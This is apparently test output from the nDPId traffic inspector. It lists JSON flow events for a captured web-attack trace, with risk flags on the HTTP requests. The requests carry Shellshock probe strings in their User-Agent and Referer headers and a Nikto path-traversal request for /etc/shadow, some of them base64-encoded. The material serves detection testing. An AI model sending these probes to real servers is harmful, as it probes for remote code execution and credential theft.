+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277464,"pkt":"AAAAAAAAAAAAAAAACABFAAEOUvlAAEAG6O5\/AAABfwAAAcV2H5BXVWoitNrsWoAYAED\/AgAAAQEICp1m\/gCdZv4AR0VUIC90bVVuYmxvY2suY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tmUnblock.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tmUnblock.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277465,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgUVAAEAGuqZ\/AAABfwAAAcV4H5AZ0bmWzQ36cYAYAED+\/gAAAQEICp1m\/gGdZv4BR0VUIC91bmFtZS5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uname.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uname.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277466,"pkt":"AAAAAAAAAAAAAAAACABFAAEM2vpAAEAGYO9\/AAABfwAAAcV6H5AtBOIv4uMLlYAYAED\/AAAAAQEICp1m\/gKdZv4CR0VUIC92aWV3Y3ZzLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewcvs.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewcvs.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277467,"pkt":"AAAAAAAAAAAAAAAACABFAAEITytAAEAG7MJ\/AAABfwAAAcV8H5BFlnf\/97sS7IAYAED+\/AAAAQEICp1m\/gOdZv4DR0VUIC93ZWxjb21lIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/welcome","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/welcome","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277469,"pkt":"AAAAAAAAAAAAAAAACABFAAEK4AFAAEAGW+p\/AAABfwAAAcV+H5B29+cpQb7It4AYAED+\/gAAAQEICp1m\/gWdZv4FR0VUIC93aG9pcy5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/whois.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/whois.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277471,"pkt":"AAAAAAAAAAAAAAAACABFAAEB0rpAAEAGaTp\/AAABfwAAAcWAH5AE8+pw+\/3ZB4AYAED+9QAAAQEICp1m\/gedZv4HR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277473,"pkt":"AAAAAAAAAAAAAAAACABFAADnqaNAAEAGkmt\/AAABfwAAAcWCH5DlqJF6VmPeaYAYAED+2wAAAQEICp1m\/gmdZv4JR0VUIC8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvc2hhZG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpkaXNod2FzaGVyKQ0KDQo="} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:dishwasher)"}} 
